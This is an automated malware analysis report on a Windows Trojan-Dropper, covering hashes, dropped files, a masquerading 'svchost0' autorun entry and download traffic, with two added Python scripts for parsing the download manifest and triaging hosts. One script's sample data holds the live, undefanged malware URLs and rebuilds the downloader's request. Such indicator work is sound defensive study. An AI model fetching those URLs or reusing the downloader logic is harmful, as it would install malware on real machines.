Gen.Variant.Barys.56335_f09eaf98a7

by malwarelabrobot on April 24th, 2017 in Malware Descriptions.

Trojan.GenericKD.4838176 (BitDefender), Trojan-Dropper.Win32.Sysn.cenj (Kaspersky), Trojan.Win32.Generic!BT (VIPRE), Trojan.Baidu.1871 (DrWeb), Trojan.GenericKD.4838176 (B) (Emsisoft), Artemis!F09EAF98A70C (McAfee), SecurityRisk.gen1 (Symantec), Trojan.GenericKD.4838176 (FSecure), Generic38.BIRH (AVG), Win32:Malware-gen (Avast), Gen:Variant.Barys.56335 (AdAware), Trojan.Win32.Swrort.3.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan, Malware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: f09eaf98a70ce17f490d7f38c3fea3ca
SHA1: 13c1a78ae7b91aee13ddcedd2f20169f74f17c13
SHA256: aaf69cdef8acc6487d416a9458462442d40bf83107254d6aaaba21f78d76878a
SSDeep: 12288:7XwOrReFWQFdeh4GSezhMCD/QplmW7NTXX1hb2lM6Vsj:7XwOrRshgjQCE3z1hmfVS
Size: 458915 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171, UPolyXv05_v6 (PEiD matches are byte-pattern heuristics and the packer hits here are not corroborated; the version resource below identifies the outer layer as a 7-Zip SFX stub)
Company: no certificate found
Created at: 2012-12-31 02:38:51
Analyzed on: Windows7 SP1 32-bit


Summary:

Trojan-Dropper: a Trojan program intended for the stealthy installation of other malware on the user's system. In this sample the outer layer is a 7-Zip SFX stub (see VersionInfo) that unpacks an Inno Setup installer (setup.exe / setup.tmp, is-*.tmp, unins000.dat); the installer drops Bind.exe and uc.exe into %Program Files%\lll, uc.exe registers itself under the HKCU Run key as "svchost0", and Bind.exe (which imports InternetOpenUrlA) retrieves a download list from www.guoneizhu.com and writes the first listed installer to the Temp folder.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:1024
setup.exe:1692
Bind.exe:3776
uc.exe:3144
setup.tmp:3172

The Trojan injects its code into the following process(es):
No code injection into other processes was observed.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1024 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7ZipSfx.000\setup.exe (788 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7ZipSfx.000\setup.exe (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7ZipSfx.000 (0 bytes)

The process setup.exe:1692 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-0606L.tmp\setup.tmp (1423 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-0606L.tmp (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-0606L.tmp\setup.tmp (0 bytes)

The process Bind.exe:3776 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Browser_V6.0.1471.913_f_4730_(Build1702151518).exe (926095 bytes)

The process setup.tmp:3172 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UIGE9.tmp\_isetup\_shfoldr.dll (47 bytes)
%Program Files%\lll\Bind.exe (49 bytes)
%Program Files%\lll\is-SN6NI.tmp (23961 bytes)
%Program Files%\lll\unins000.dat (1376 bytes)
%Program Files%\lll\yyy.ini (25 bytes)
%Program Files%\lll\is-KLOJP.tmp (49 bytes)
%Program Files%\lll\is-CHKF7.tmp (673 bytes)
%Program Files%\lll\uc.exe (147 bytes)

The Trojan deletes the following file(s):

C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UIGE9.tmp\_isetup\_shfoldr.dll (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UIGE9.tmp\_isetup (0 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UIGE9.tmp (0 bytes)

Registry activity

The process %original file name%.exe:1024 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"

The Trojan deletes the following value(s) in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

The process Bind.exe:3776 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 3E 00 00 00 09 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASAPI32]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"ConsoleTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASAPI32]
"FileDirectory" = "%windir%\tracing"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASAPI32]
"MaxFileSize" = "1048576"

[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASMANCS]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Tracing\Bind_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyServer"
"AutoConfigURL"

The process uc.exe:3144 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
To run itself each time Windows starts, the Trojan adds a reference to its file under the system autorun key, using the value name "svchost0" so that it resembles the legitimate Windows svchost.exe:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"svchost0" = "%Program Files%\lll\uc.exe"

The process setup.tmp:3172 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\RestartManager\Session0000]
"Sequence" = "1"
"RegFilesHash" = "2C 4C 49 ED 65 8F 74 92 99 64 09 F3 4F 5F 31 52"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"

[HKCU\Software\Microsoft\RestartManager\Session0000]
"RegFiles0000" = "%Program Files%\lll\uc.exe, %Program Files%\lll\Bind.exe"
"SessionHash" = "F5 30 93 F5 7E 25 C3 7D 7F E4 F0 4C 99 25 86 31"
"Owner" = "64 0C 00 00 C4 47 1E FB D4 BB D2 01"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"

The Trojan deletes the following registry key(s):

[HKCU\Software\Microsoft\RestartManager\Session0000]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\RestartManager\Session0000]
"RegFilesHash"
"Sequence"
"RegFiles0000"
"SessionHash"
"Owner"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
"ProxyBypass"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"

Dropped PE files

MD5 File path
86b7f4a91af28ca519e1de52916cf688 c:\Program Files\lll\Bind.exe
08200a6b207e50a87375dc7c82908d06 c:\Program Files\lll\uc.exe
14023e92a84f8a82c10a6a1d6b1182be c:\Program Files\lll\unins000.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name: Oleg N. Scherbakov
Product Name: 7-Zip SFX
Product Version: 1.6.0.2712
Legal Copyright: Copyright (c) 2005-2012 Oleg N. Scherbakov
Legal Trademarks:
Original Filename: 7ZSfxMod_x86.exe
Internal Name: 7ZSfxMod
File Version: 1.6.0.2712
File Description: 7z Setup SFX (x86)
Comments:
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 101854 101888 4.62608 0c04e49d78a3c453186c916e6f29540d
.rdata 106496 15306 15360 3.96022 1eff757b36a6b7a599236ac8b1b35b4d
.data 122880 19948 2560 3.08518 21d5c7a8ba54658b1e07909bf1045c79
.rsrc 143360 6124 6144 2.44721 8a4ce16b05b7e5db4cc67ec2b030ef27

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 7
712fe060095354d46e56453a9e89361a
53aab8f119044b5d5acf11b1e9e1a752
b6531269133af53933634722c54f1018
c59ec9aa2900d0444e445184b567cb8f
f7ee0c604322fd2ecde860d9e255e401
018dc6096ab70a223715be23a7529094
b74229149dee4708eeb55641b246cf2c

URLs

URL IP
hxxp://www.guoneizhu.com/uc222.txt
hxxp://www.guoneizhu.com/Browser_V6.0.1471.913_f_4730_(Build1702151518).exe


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY PE EXE or DLL Windows file download HTTP
ET MALWARE Possible Windows executable sent when remote host claims to send a Text File
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected

Traffic

GET /uc222.txt HTTP/1.1
Accept: */*
Accept-Language: zh-cn
User-Agent: wget
Host: VVV.guoneizhu.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Tue, 18 Apr 2017 07:17:26 GMT
Accept-Ranges: bytes
ETag: "c4fde1d413b8d21:0"
Server: Microsoft-IIS/10.0
Date: Sun, 23 Apr 2017 01:55:58 GMT
Content-Length: 362
hXXp://VVV.guoneizhu.com/Browser_V6.0.1471.913_f_4730_(Build1702151518).exe Browser_V6.0.1471.913_f_4730_(Build1702151518).exe
hXXp://VVV.guoneizhu.com/FlowSpritSetup_slnt_5016.exe FlowSpritSetup_slnt_5016.exe
hXXp://VVV.guoneizhu.com/PSoft_4010_1.0.0.104_Setup.exe PSoft_4010_1.0.0.104_Setup.exe
hXXp://VVV.guoneizhu.com/MagicDiskSetup.exe MagicDiskSetup.exe



GET /Browser_V6.0.1471.913_f_4730_(Build1702151518).exe HTTP/1.1
Accept: */*
Accept-Language: zh-cn
User-Agent: wget
Host: VVV.guoneizhu.com
Cache-Control: no-cache


HTTP/1.1 200 OK
Content-Type: application/octet-stream
Last-Modified: Tue, 21 Feb 2017 14:09:35 GMT
Accept-Ranges: bytes
ETag: "e7c03c214c8cd21:0"
Server: Microsoft-IIS/10.0
Date: Sun, 23 Apr 2017 01:55:58 GMT
Content-Length: 51185040
MZ......................@...................................H.........
..!..L.!This program cannot be run in DOS mode....$.......]....o...o..
.o....]..o...._..o....^.;o...6...o....k..o..w4...o..w4..Xo..w4..[o....
X..o..w2...o....C.>o...o...m...4..Xo...4...o...4..]o...4...o...4S..
o...o;..o...4...o..Rich.o..........................PE..L...Y..X.......
.............................. ....@..........................`......
'..................................Y.......T.......h................3.
......n..@...T...............................@........................
....................text...I........................... ..`.data...<
;e... ......................@....idata...,...........&..............@.
.@.gfids..(............T..............@..@.tls.................X......
........@....rsrc...h............Z..............@..@.reloc...n.......p
...b..............@..B................................................
......................................................................
....................................................A.......J...A...A.
..A...A...A...A...A...A...A...A...A...A.3.A.'.A.?.A.Z.A.u.A...A...A.p.
A...........J...J...J.)JK.mhL...L.o.L......... .E...........L...L..KK.
................{.6.5.1.2.2.C.B.0.-.E.A.0.F.-.4.7.D.F.-.A.9.5.3.-.0.1.
7.1.7.0.E.D.1.2.F.9.}.....{.4.e.a.1.6.a.c.7.-.f.d.5.a.-.4.7.c.3.-.8.7.
5.b.-.d.b.f.4.a.2.0.0.8.c.2.0.}.....{.8.B.A.9.8.6.D.A.-.5.1.0.0.-.4.0.
5.E.-.A.A.3.5.-.8.6.F.3.4.A.0.2.A.C.B.F.}.....{.4.D.C.8.B.4.C.A.-.1.B.
D.A.-.4.8.3.e.-.B.5.F.A.-.D.3.C.1.2.E.1.5.B.6.2.D.}.......E.-.-.c.

<<< skipped >>>
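The uc222.txt response above is the downloader's stage-2 manifest: one record per line, "<url><space><local filename>", and Bind.exe then fetches the first entry. The parser below is an added example and is not code from the report or from the sample. Its sample manifest is constructed by re-typing the captured body with CRLF line endings and the defanging undone (hXXp -> http, VVV -> www); the request builder reuses the headers seen in the capture, and its optional Range header is an assumption taken from the "Range: bytes=%d-" format string in the Bind.exe strings dump (no Range header appears in the capture itself). The resume offset in the usage call is the 926095-byte partial size of the Browser_V6 installer at the time of the snapshot.

```python
"""Parse the stage-2 download manifest (uc222.txt) fetched by Bind.exe.

Added example, not code from the report or from the sample. SAMPLE_MANIFEST
is constructed from the captured response (CRLF endings restored, defanging
undone); build_request()'s Range header is an assumption, see lead-in.
"""
from urllib.parse import urlsplit, unquote

SAMPLE_MANIFEST = (
    "http://www.guoneizhu.com/Browser_V6.0.1471.913_f_4730_(Build1702151518).exe "
    "Browser_V6.0.1471.913_f_4730_(Build1702151518).exe\r\n"
    "http://www.guoneizhu.com/FlowSpritSetup_slnt_5016.exe "
    "FlowSpritSetup_slnt_5016.exe\r\n"
    "http://www.guoneizhu.com/PSoft_4010_1.0.0.104_Setup.exe "
    "PSoft_4010_1.0.0.104_Setup.exe\r\n"
    "http://www.guoneizhu.com/MagicDiskSetup.exe MagicDiskSetup.exe\r\n"
    "\r\n"
)


def parse_manifest(body):
    """Return one dict per record: url, host, path, local filename.

    Records are "<url><space><filename>" lines; blank lines are skipped.
    The filename is taken as the last space-separated token so a URL that
    itself contains spaces would still parse (the captured ones have none).
    """
    records = []
    for raw in body.splitlines():
        line = raw.strip()
        if not line:
            continue
        url, _, filename = line.rpartition(" ")
        if not url:
            raise ValueError("malformed manifest record: %r" % line)
        parts = urlsplit(url)
        records.append({
            "url": url,
            "host": parts.hostname,
            "path": parts.path,
            "filename": filename,
            # The downloader names the file after the URL's last segment; a
            # mismatch would mean the server can choose the on-disk name.
            "name_matches_url": unquote(parts.path.rsplit("/", 1)[-1]) == filename,
        })
    return records


def is_stage2_manifest(content_type, body):
    """True when a response labelled text/* lists nothing but PE downloads.

    A text-typed body consisting only of executable URLs is a strong
    downloader indicator on its own, independent of any IDS signature.
    """
    if not content_type.lower().startswith("text/"):
        return False
    try:
        records = parse_manifest(body)
    except ValueError:
        return False
    return bool(records) and all(
        r["path"].lower().endswith((".exe", ".dll", ".scr")) for r in records
    )


def defang(url):
    """Neuter a URL for reports: break the scheme and the dots in the host."""
    parts = urlsplit(url)
    scheme = {"http": "hxxp", "https": "hxxps"}.get(parts.scheme, parts.scheme)
    return "%s://%s%s" % (scheme, parts.hostname.replace(".", "[.]"), parts.path)


def build_request(url, resume_from=None):
    """Rebuild the raw HTTP/1.1 request the downloader issues for an entry.

    Header set and order follow the capture; the Range line (only emitted
    when resume_from is given) is an assumption based on the Bind.exe
    strings "GET%sHTTP/1.1" and "Range: bytes=%d-".
    """
    parts = urlsplit(url)
    lines = [
        "GET %s HTTP/1.1" % parts.path,
        "Accept: */*",
        "Accept-Language: zh-cn",
        "User-Agent: wget",
        "Host: %s" % parts.hostname,
        "Cache-Control: no-cache",
    ]
    if resume_from is not None:
        lines.append("Range: bytes=%d-" % resume_from)
    return "\r\n".join(lines) + "\r\n\r\n"


if __name__ == "__main__":
    records = parse_manifest(SAMPLE_MANIFEST)
    for rec in records:
        print(defang(rec["url"]), rec["filename"], rec["name_matches_url"])
    print(is_stage2_manifest("text/plain", SAMPLE_MANIFEST))
    print(build_request(records[0]["url"], resume_from=926095))
```

Run against a proxy or sandbox log, is_stage2_manifest() is the check to apply to every small text/plain response that precedes a large application/octet-stream download from the same host; defang() produces the form of the four URLs suitable for sharing as indicators.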

The Trojan connects to the server(s) at the following location(s):

www.guoneizhu.com (see the URLs and Traffic sections above)

Strings from dumps

uc.exe_3144:

.text
`.rdata
@.data
.rsrc
__MSVCRT_HEAP_SELECT
user32.dll
KERNEL32.dll
USER32.dll
RegCloseKey
RegOpenKeyExW
RegDeleteKeyW
RegCreateKeyW
RegOpenKeyW
ADVAPI32.dll
ShellExecuteW
SHELL32.dll
COMCTL32.dll
GetCPInfo
%s\*.*
%s\%s
@.reloc
GetProcessWindowStation
"%/28;=#$019:>?
mgM
zcÁ
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
1 1@1`1|1
8 8$80848
%Program Files%\lll\uc.exe
<assemblyIdentity version="9.4.3.2"
<requestedExecutionLevel
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\2345Explorer
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\2345Explorer
%USERPROFILE%\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\2345
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
\aa.lnk
Chrome_WidgetWin_1
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\
C:\Users\Public\Desktop\
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{96F04C1B-E352-4A90-BED4-11A0FA968BC1}_is1
%s\Internet Explorer\iexplore.exe
http\shell\open\command
qqbrowser.exe
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
%USERPROFILE%\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\UC
SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\UCBrowser
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\UCBrowser
%s\UCBrowser.exe
mscoree.dll
@KERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
index.dat
%Program Files% (x86)\UCBrowser\Application\UCBrowser.exe
%Program Files% (x86)\2345Soft\2345Explorer\2345Explorer.exe
%Program Files% (x86)\KuaiZip\X86\KuaiZip.exe
%Program Files% (x86)\IQIYI Video\LStyle\5.3.21.2676\QyClient.exe
%Program Files% (x86)\LuDaShi\ComputerZ_CN.exe
%Program Files% (x86)\YouKu\YoukuClient\YoukuDesktop.exe
InstallerSuccessLaunchCmdLine
Software\Microsoft\Windows\CurrentVersion\Run
\UUC0789.exe

Bind.exe_3776:

.text
`.rdata
@.data
.rsrc
__MSVCRT_HEAP_SELECT
user32.dll
KERNEL32.dll
USER32.dll
ShellExecuteA
SHELL32.dll
HttpQueryInfoA
InternetOpenUrlA
WININET.dll
GetCPInfo
GET%sHTTP/1.1
Range: bytes=%d-
%Program Files%\lll\Bind.exe
1, 0, 0, 1
Bind.exe


Remove it with Ad-Aware

  1. Download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:1024
    setup.exe:1692
    Bind.exe:3776
    uc.exe:3144
    setup.tmp:3172

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\7ZipSfx.000\setup.exe (788 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-0606L.tmp\setup.tmp (1423 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\Browser_V6.0.1471.913_f_4730_(Build1702151518).exe (926095 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UIGE9.tmp\_isetup\_shfoldr.dll (47 bytes)
    %Program Files%\lll\Bind.exe (49 bytes)
    %Program Files%\lll\is-SN6NI.tmp (23961 bytes)
    %Program Files%\lll\unins000.dat (1376 bytes)
    %Program Files%\lll\yyy.ini (25 bytes)
    %Program Files%\lll\is-KLOJP.tmp (49 bytes)
    %Program Files%\lll\is-CHKF7.tmp (673 bytes)
    %Program Files%\lll\uc.exe (147 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "svchost0" = "%Program Files%\lll\uc.exe"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
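The manual steps above amount to three checks: a Run value named "svchost0" pointing at %Program Files%\lll\uc.exe, files under %Program Files%\lll, and the three dropped PE hashes. The script below is an added example, not part of the report, that applies those checks to exported host data so the same triage can be repeated across many machines. Its inventory (Run values and a file listing with MD5s) is constructed inline to stand in for what you would export from a suspect host; it never reads the live registry. The generalisation beyond the report is the svchost masquerade rule: any Run value whose name begins with "svchost" but whose target is not the Windows svchost.exe is flagged, not only the observed "svchost0".

```python
"""Triage exported host data against the indicators in this report.

Added example, not part of the report. SAMPLE_RUN_VALUES and SAMPLE_FILES
are constructed stand-ins for data exported from a suspect machine (the
benign OneDrive entry and the svchost.exe hash are made up for contrast).
"""
import re

# "Dropped PE files" table above.
DROPPED_MD5 = {
    "86b7f4a91af28ca519e1de52916cf688": "Bind.exe",
    "08200a6b207e50a87375dc7c82908d06": "uc.exe",
    "14023e92a84f8a82c10a6a1d6b1182be": "unins000.exe",
}
RUN_VALUE_NAME = "svchost0"  # HKCU\...\CurrentVersion\Run value set by uc.exe
INSTALL_DIR_RE = re.compile(r"^[a-z]:\\program files( \(x86\))?\\lll\\", re.I)
# The genuine svchost.exe lives only under the Windows directory.
REAL_SVCHOST_RE = re.compile(
    r"^[a-z]:\\windows\\(system32|syswow64)\\svchost\.exe$", re.I)
# First .exe in a Run command, with or without surrounding quotes.
EXE_IN_CMD_RE = re.compile(r'^\s*"?([^"]+?\.exe)', re.I)

SAMPLE_RUN_VALUES = [  # constructed: one benign entry plus the observed one
    ("OneDrive", r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("svchost0", r"C:\Program Files\lll\uc.exe"),
]
SAMPLE_FILES = [  # constructed: (path, md5); last hash is a made-up benign value
    (r"C:\Program Files\lll\uc.exe", "08200a6b207e50a87375dc7c82908d06"),
    (r"C:\Program Files\lll\Bind.exe", "86b7f4a91af28ca519e1de52916cf688"),
    (r"C:\Program Files\lll\yyy.ini", "8f1a4c0b9e2d7a6b5c4d3e2f1a0b9c8d"),
    (r"C:\Windows\System32\svchost.exe", "0123456789abcdef0123456789abcdef"),
]


def check_run_values(run_values):
    """Flag Run values by observed name, by target path, and by svchost masquerade."""
    findings = []
    for name, command in run_values:
        m = EXE_IN_CMD_RE.match(command)
        target = m.group(1) if m else command.strip()
        reasons = []
        if name.lower() == RUN_VALUE_NAME:
            reasons.append("Run value name matches the observed persistence entry")
        if name.lower().startswith("svchost") and not REAL_SVCHOST_RE.match(target):
            reasons.append("svchost-like name but target is not the Windows svchost.exe")
        if INSTALL_DIR_RE.match(target):
            reasons.append("target is under %ProgramFiles%\\lll")
        if reasons:
            findings.append({"value": name, "target": target, "reasons": reasons})
    return findings


def check_files(files):
    """Flag files by known dropped-PE MD5 and by the install directory."""
    findings = []
    for path, md5 in files:
        reasons = []
        known = DROPPED_MD5.get(md5.lower())
        if known:
            reasons.append("MD5 matches dropped %s" % known)
        if INSTALL_DIR_RE.match(path):
            reasons.append("located under %ProgramFiles%\\lll")
        if reasons:
            findings.append({"path": path, "md5": md5.lower(), "reasons": reasons})
    return findings


def triage(run_values, files):
    """Run both checks and list cleanup actions in the report's order
    (files, then the autorun value); terminate the listed processes first."""
    run = check_run_values(run_values)
    fs = check_files(files)
    plan = ["delete file %s" % f["path"] for f in fs]
    plan += ["delete Run value %r (-> %s)" % (f["value"], f["target"]) for f in run]
    return {"run": run, "files": fs, "plan": plan}


if __name__ == "__main__":
    result = triage(SAMPLE_RUN_VALUES, SAMPLE_FILES)
    for finding in result["run"] + result["files"]:
        print(finding)
    print("\n".join(result["plan"]))
```

Feed it the output of a registry export of HKCU\Software\Microsoft\Windows\CurrentVersion\Run and a hashed directory listing; the yyy.ini hit shows that the path rule catches non-PE residue the hash table cannot, while the genuine svchost.exe produces no finding.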
